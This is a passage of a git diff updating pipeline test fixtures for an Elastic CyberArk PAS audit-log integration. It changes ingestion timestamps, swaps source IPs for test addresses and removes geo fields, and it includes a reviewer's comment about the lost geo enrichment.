\u003cFile\u003eroot\\\\87012dcc-8290-11eb-949e-080027efd402.SSH.txt\u003c/File\u003e\\n \u003cStation\u003e81.32.170.205\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eStore File\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 09:38:27\",\"IsoTimestamp\":\"2021-03-11T17:38:27Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"50\",\"Desc\":\"Store File\",\"Severity\":\"Info\",\"Issuer\":\"PSMPApp_VAGRANT\",\"Action\":\"Store 
File\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSMRecordings\",\"File\":\"root\\\\87012dcc-8290-11eb-949e-080027efd402.SSH.txt\",\"Station\":\"81.32.170.205\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Store File\",\"GatewayStation\":\"\"}}}", + "ingested": "2021-12-09T13:37:06.052383700Z", + "original": "\u003c5\u003e1 2021-03-11T17:38:27Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 09:38:27\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T17:38:27Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e50\u003c/MessageID\u003e\\n \u003cDesc\u003eStore File\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003ePSMPApp_VAGRANT\u003c/Issuer\u003e\\n \u003cAction\u003eStore File\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePSMRecordings\u003c/Safe\u003e\\n \u003cFile\u003eroot\\\\87012dcc-8290-11eb-949e-080027efd402.SSH.txt\u003c/File\u003e\\n \u003cStation\u003e67.43.156.13\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eStore File\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 
09:38:27\",\"IsoTimestamp\":\"2021-03-11T17:38:27Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"50\",\"Desc\":\"Store File\",\"Severity\":\"Info\",\"Issuer\":\"PSMPApp_VAGRANT\",\"Action\":\"Store File\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSMRecordings\",\"File\":\"root\\\\87012dcc-8290-11eb-949e-080027efd402.SSH.txt\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Store File\",\"GatewayStation\":\"\"}}}", "code": "50", "kind": "event" } 
@@ -388,7 +353,7 @@ "event": { "severity": 2, "action": "store file", - "ingested": "2021-06-09T10:24:35.653829700Z", + "ingested": "2021-12-09T13:37:06.052388Z", "original": "\u003c5\u003e1 2021-03-11T19:45:26Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 11:45:26\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T19:45:26Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e50\u003c/MessageID\u003e\\n \u003cDesc\u003eStore File\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eStore File\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePVWAConfig\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\PVConfiguration.xml\u003c/File\u003e\\n \u003cStation\u003e127.0.0.1\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eStore File\u003c/Message\u003e\\n \u003cGatewayStation\u003e10.0.1.20\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 11:45:26\",\"IsoTimestamp\":\"2021-03-11T19:45:26Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"50\",\"Desc\":\"Store File\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Store 
File\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PVWAConfig\",\"File\":\"Root\\\\PVConfiguration.xml\",\"Station\":\"127.0.0.1\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Store File\",\"GatewayStation\":\"10.0.1.20\"}}}", "code": "50", "kind": "event" diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-51-retrieve-file.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-51-retrieve-file.log-expected.json index 4b11f1bcaf9..14ef75b4cb3 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-51-retrieve-file.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-51-retrieve-file.log-expected.json @@ -52,7 +52,7 @@ "event": { "severity": 2, "action": "retrieve file", - "ingested": "2021-06-09T10:24:35.778795800Z", + "ingested": "2021-12-09T13:37:06.666779900Z", "original": "\u003c5\u003e1 2021-03-04T19:10:05Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 04 11:10:05\",\"IsoTimestamp\":\"2021-03-04T19:10:05Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"51\",\"Desc\":\"Retrieve File\",\"Severity\":\"Info\",\"Issuer\":\"PasswordManager\",\"Action\":\"Retrieve File\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PasswordManagerShared\",\"File\":\"Root\\\\Policies\\\\Policy-GenericWebApp.ini\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Retrieve File\",\"GatewayStation\":\"\"}}}", "code": "51", "kind": "event" 
@@ -110,7 +110,7 @@ "event": { "severity": 2, "action": "retrieve file", - "ingested": "2021-06-09T10:24:35.778809900Z", + "ingested": "2021-12-09T13:37:06.666790300Z", "original": "\u003c5\u003e1 2021-03-04T19:11:23Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 04 11:11:23\",\"IsoTimestamp\":\"2021-03-04T19:11:23Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"51\",\"Desc\":\"Retrieve File\",\"Severity\":\"Info\",\"Issuer\":\"Prov_COMPONENTS\",\"Action\":\"Retrieve File\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"AppProviderConf\",\"File\":\"Root\\\\main_appprovider.conf.Win64.11.04\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Retrieve File\",\"GatewayStation\":\"\"}}}", "code": "51", "kind": "event" diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-52-delete-file.log b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-52-delete-file.log index d9d8af79da4..127e5680b04 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-52-delete-file.log +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-52-delete-file.log 
@@ -1,9 +1,9 @@ <5>1 2021-03-08T18:32:43Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 08 10:32:43","IsoTimestamp":"2021-03-08T18:32:43Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"52","Desc":"Delete File","Severity":"Info","Issuer":"Administrator","Action":"Delete File","SourceUser":"","TargetUser":"","Safe":"Test","File":"Root\\Operating System-WinDesktopLocal-Address-adriansr","Station":"127.0.0.1","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Delete File","GatewayStation":"10.0.1.20","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"WinDesktopLocal"},{"Name":"UserName","Value":"adriansr"},{"Name":"Address","Value":"components"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} <5>1 2021-03-08T18:38:21Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 08 10:38:21","IsoTimestamp":"2021-03-08T18:38:21Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"52","Desc":"Delete File","Severity":"Info","Issuer":"Administrator","Action":"Delete File","SourceUser":"","TargetUser":"","Safe":"VaultInternal","File":"Root\\Operating System-WinServerLocal-components-adriansr","Station":"127.0.0.1","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Delete File","GatewayStation":"10.0.1.20","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"WinServerLocal"},{"Name":"UserName","Value":"adriansr"},{"Name":"Address","Value":"components"},{"Name":"LogonDomain","Value":"COMPONENTS"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} <5>1 2021-03-08T19:20:04Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 08 
11:20:04","IsoTimestamp":"2021-03-08T19:20:04Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"52","Desc":"Delete File","Severity":"Info","Issuer":"PasswordManager","Action":"Delete File","SourceUser":"","TargetUser":"","Safe":"PasswordManager_workspace","File":"Root\\Test_4","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Delete File","GatewayStation":""}}} -<5>1 2021-03-11T18:59:57Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 10:59:57\n 2021-03-11T18:59:57Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 52\n Delete File\n Info\n PSMApp_ASR-WIN\n Delete File\n \n \n PSMSessions\n Root\\c89ca3ba9c76f820fdc58e86f2c854f99d232fcd\n 35.192.121.42\n \n \n \n \n \n Delete File\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 10:59:57","IsoTimestamp":"2021-03-11T18:59:57Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"52","Desc":"Delete File","Severity":"Info","Issuer":"PSMApp_ASR-WIN","Action":"Delete File","SourceUser":"","TargetUser":"","Safe":"PSMSessions","File":"Root\\c89ca3ba9c76f820fdc58e86f2c854f99d232fcd","Station":"35.192.121.42","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Delete File","GatewayStation":""}}} +<5>1 2021-03-11T18:59:57Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 10:59:57\n 2021-03-11T18:59:57Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 52\n Delete File\n Info\n PSMApp_ASR-WIN\n Delete File\n \n \n PSMSessions\n Root\\c89ca3ba9c76f820fdc58e86f2c854f99d232fcd\n 67.43.156.14\n \n \n \n \n \n Delete File\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 10:59:57","IsoTimestamp":"2021-03-11T18:59:57Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"52","Desc":"Delete 
File","Severity":"Info","Issuer":"PSMApp_ASR-WIN","Action":"Delete File","SourceUser":"","TargetUser":"","Safe":"PSMSessions","File":"Root\\c89ca3ba9c76f820fdc58e86f2c854f99d232fcd","Station":"67.43.156.14","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Delete File","GatewayStation":""}}} <5>1 2021-03-11T19:32:12Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 11:32:12\n 2021-03-11T19:32:12Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 52\n Delete File\n Info\n Administrator\n Delete File\n \n \n PSMPLiveSessions\n Root\\PSMPApp_VAGRANT.LiveSessions\n 127.0.0.1\n \n \n \n \n \n Delete File\n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 11:32:12","IsoTimestamp":"2021-03-11T19:32:12Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"52","Desc":"Delete File","Severity":"Info","Issuer":"Administrator","Action":"Delete File","SourceUser":"","TargetUser":"","Safe":"PSMPLiveSessions","File":"Root\\PSMPApp_VAGRANT.LiveSessions","Station":"127.0.0.1","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Delete File","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"_PSMLiveSessions_1","Value":""},{"Name":"_PSMLiveSessions_2","Value":""},{"Name":"_PSMLiveSessions_3","Value":""},{"Name":"_PSMLiveSessions_4","Value":""},{"Name":"_PSMLiveSessions_5","Value":""}]}}}} -<5>1 2021-03-11T21:06:40Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 13:06:40\n 2021-03-11T21:06:40Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 52\n Delete File\n Info\n Administrator\n Delete File\n \n \n PSM\n Root\\Operating System-WinDomain-35.192.121.42-PSMConnect\n 127.0.0.1\n \n \n \n \n \n Delete File\n 10.0.1.20\n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 
13:06:40","IsoTimestamp":"2021-03-11T21:06:40Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"52","Desc":"Delete File","Severity":"Info","Issuer":"Administrator","Action":"Delete File","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-WinDomain-35.192.121.42-PSMConnect","Station":"127.0.0.1","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Delete File","GatewayStation":"10.0.1.20","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"WinDomain"},{"Name":"UserName","Value":"PSMConnect"},{"Name":"Address","Value":"35.192.121.42"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} +<5>1 2021-03-11T21:06:40Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 13:06:40\n 2021-03-11T21:06:40Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 52\n Delete File\n Info\n Administrator\n Delete File\n \n \n PSM\n Root\\Operating System-WinDomain-67.43.156.14-PSMConnect\n 127.0.0.1\n \n \n \n \n \n Delete File\n 10.0.1.20\n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 13:06:40","IsoTimestamp":"2021-03-11T21:06:40Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"52","Desc":"Delete File","Severity":"Info","Issuer":"Administrator","Action":"Delete File","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-WinDomain-67.43.156.14-PSMConnect","Station":"127.0.0.1","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Delete File","GatewayStation":"10.0.1.20","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"WinDomain"},{"Name":"UserName","Value":"PSMConnect"},{"Name":"Address","Value":"67.43.156.14"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} <5>1 2021-03-11T21:06:50Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n 
\n yes\n Mar 11 13:06:50\n 2021-03-11T21:06:50Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 52\n Delete File\n Info\n Administrator\n Delete File\n \n \n PSM\n Root\\PSM-ASR-CYBERARK-WI\n 127.0.0.1\n \n \n \n \n \n Delete File\n 10.0.1.20\n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 13:06:50","IsoTimestamp":"2021-03-11T21:06:50Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"52","Desc":"Delete File","Severity":"Info","Issuer":"Administrator","Action":"Delete File","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\PSM-ASR-CYBERARK-WI","Station":"127.0.0.1","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Delete File","GatewayStation":"10.0.1.20","CAProperties":{"CAProperty":[{"Name":"UserName","Value":"PSMConnect"},{"Name":"Address","Value":"10.128.0.65"},{"Name":"LogonDomain","Value":"ASR-CYBERARK-WI"}]}}}} <5>1 2021-03-14T12:10:17Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 05:10:17\n 2021-03-14T12:10:17Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 52\n Delete File\n Info\n Administrator\n Delete File\n \n \n PSM\n Root\\PSMAdmin\n 127.0.0.1\n \n \n \n \n \n Delete File\n 10.0.1.20\n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 05:10:17","IsoTimestamp":"2021-03-14T12:10:17Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"52","Desc":"Delete File","Severity":"Info","Issuer":"Administrator","Action":"Delete File","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\PSMAdmin","Station":"127.0.0.1","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Delete File","GatewayStation":"10.0.1.20","CAProperties":{"CAProperty":[{"Name":"UserName","Value":"PSMAdminConnect"},{"Name":"Address","Value":"169.254.180.25"},{"Name":"LogonDomain","Value":"VAGRANT-2012-R2"}]}}}} <5>1 2021-03-15T15:09:00Z VAULT 
{"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 08:09:00\n 2021-03-15T15:09:00Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 52\n Delete File\n Info\n Administrator\n Delete File\n \n \n partner\n Root\\Database-Oracle-10.128.0.7-adrian\n 127.0.0.1\n \n \n \n \n \n Delete File\n 10.0.1.20\n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 08:09:00","IsoTimestamp":"2021-03-15T15:09:00Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"52","Desc":"Delete File","Severity":"Info","Issuer":"Administrator","Action":"Delete File","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Database-Oracle-10.128.0.7-adrian","Station":"127.0.0.1","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Delete File","GatewayStation":"10.0.1.20","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"Oracle"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"10.128.0.7"},{"Name":"Port","Value":"3306"},{"Name":"Database","Value":"test"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Database"}]}}}} diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-52-delete-file.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-52-delete-file.log-expected.json index 65245ebf786..7fc36b20c4b 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-52-delete-file.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-52-delete-file.log-expected.json 
@@ -69,7 +69,7 @@ "event": { "severity": 2, "action": "delete file", - "ingested": "2021-06-09T10:24:35.820704600Z", + "ingested": "2021-12-09T13:37:06.873530700Z", "original": "\u003c5\u003e1 2021-03-08T18:32:43Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 08 10:32:43\",\"IsoTimestamp\":\"2021-03-08T18:32:43Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"52\",\"Desc\":\"Delete File\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Delete File\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"Test\",\"File\":\"Root\\\\Operating System-WinDesktopLocal-Address-adriansr\",\"Station\":\"127.0.0.1\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Delete File\",\"GatewayStation\":\"10.0.1.20\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"WinDesktopLocal\"},{\"Name\":\"UserName\",\"Value\":\"adriansr\"},{\"Name\":\"Address\",\"Value\":\"components\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", "code": "52", "kind": "event" 
@@ -145,7 +145,7 @@ "event": { "severity": 2, "action": "delete file", - "ingested": "2021-06-09T10:24:35.820719900Z", + "ingested": "2021-12-09T13:37:06.873540300Z", "original": "\u003c5\u003e1 2021-03-08T18:38:21Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 08 10:38:21\",\"IsoTimestamp\":\"2021-03-08T18:38:21Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"52\",\"Desc\":\"Delete File\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Delete File\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"VaultInternal\",\"File\":\"Root\\\\Operating System-WinServerLocal-components-adriansr\",\"Station\":\"127.0.0.1\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Delete File\",\"GatewayStation\":\"10.0.1.20\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"WinServerLocal\"},{\"Name\":\"UserName\",\"Value\":\"adriansr\"},{\"Name\":\"Address\",\"Value\":\"components\"},{\"Name\":\"LogonDomain\",\"Value\":\"COMPONENTS\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", "code": "52", "kind": "event" 
@@ -203,7 +203,7 @@ "event": { "severity": 2, "action": "delete file", - "ingested": "2021-06-09T10:24:35.820722100Z", + "ingested": "2021-12-09T13:37:06.873546400Z", "original": "\u003c5\u003e1 2021-03-08T19:20:04Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 08 11:20:04\",\"IsoTimestamp\":\"2021-03-08T19:20:04Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"52\",\"Desc\":\"Delete File\",\"Severity\":\"Info\",\"Issuer\":\"PasswordManager\",\"Action\":\"Delete File\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PasswordManager_workspace\",\"File\":\"Root\\\\Test_4\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Delete File\",\"GatewayStation\":\"\"}}}", "code": "52", "kind": "event" @@ -216,19 +216,8 @@ } }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-VA", - "country_name": "United States", - "region_name": "Virginia", - "location": { - "lon": -77.2481, - "lat": 38.6583 - }, - "country_iso_code": "US" - }, - "address": "35.192.121.42", - "ip": "35.192.121.42" + "address": "67.43.156.14", + "ip": "67.43.156.14" }, "tags": [ "preserve_original_event" @@ -248,7 +237,7 @@ }, "related": { "ip": [ - "35.192.121.42" + "67.43.156.14" ] }, "cyberarkpas": { 
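Review bot: In the hunk `@@ -216,19 +216,8 @@` the regenerated expectation removes the whole `source.geo` object for 67.43.156.14 instead of replacing its values, so this fixture no longer asserts geo enrichment for the event at all. If the reason for moving to the supported test-IP subset is that the stack's bundled GeoIP test database resolves these addresses, the expected output should carry the new `geo` values for 67.43.156.14; an absent object suggests the expectation was regenerated against a stack whose database did not cover this address, or that the enrichment (presumably a geoip processor on `source.ip`) failed silently. Please confirm the regeneration environment, and if this address genuinely does not resolve in the test database, prefer one from the subset that does so the `source.geo` assertions are kept. The `related.ip` update in `@@ -248,7 +237,7 @@` and the `source.address`/`source.ip` lines are consistent with the new address.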
@@ -258,8 +247,8 @@ "iso_timestamp": "2021-03-11T18:59:57Z", "file": "Root\\c89ca3ba9c76f820fdc58e86f2c854f99d232fcd", "safe": "PSMSessions", - "station": "35.192.121.42", - "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 11 10:59:57\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-11T18:59:57Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e52\u003c/MessageID\u003e\n \u003cDesc\u003eDelete File\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003ePSMApp_ASR-WIN\u003c/Issuer\u003e\n \u003cAction\u003eDelete File\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003ePSMSessions\u003c/Safe\u003e\n \u003cFile\u003eRoot\\c89ca3ba9c76f820fdc58e86f2c854f99d232fcd\u003c/File\u003e\n \u003cStation\u003e35.192.121.42\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\n \u003cMessage\u003eDelete File\u003c/Message\u003e\n 